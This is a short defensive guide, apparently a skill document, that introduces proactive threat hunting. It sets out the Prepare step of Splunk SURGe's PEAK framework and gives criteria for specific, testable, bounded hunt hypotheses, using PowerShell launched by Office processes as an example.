Threat Hunting — Proactive Adversary Detection

Hunt for adversaries who are already inside but haven't tripped an alert. Distinct from incident-triage (reactive, alert is firing) and from siem-detection (engineer rules so future alerts fire). This skill is the proactive layer — assume something has slipped through, look for it.

Hunting is hypothesis-driven, not browse-driven. "Let's look around the SIEM" is not hunting; "let's check for the specific pattern of T1059.001 (PowerShell) being launched by Office processes" is.

Cross-references: siem-detection (queries you write here often graduate to detection rules), incident-triage (what to do if a hunt confirms a finding), breach-patterns (a rich source of hunt hypotheses), disk-forensics (deeper analysis on confirmed hits).

Methodology — PEAK framework

The PEAK (Prepare, Execute, Act, Knowledge) framework from Splunk SURGe — the most actionable hunting methodology I've seen.

Step 1: Prepare

Form the hypothesis. Strong hypotheses share three properties:

1. Specific — names a technique, log source, and expected artifact
2. Testable — describes what evidence would confirm or deny
3. Bounded — has a defined time window and scope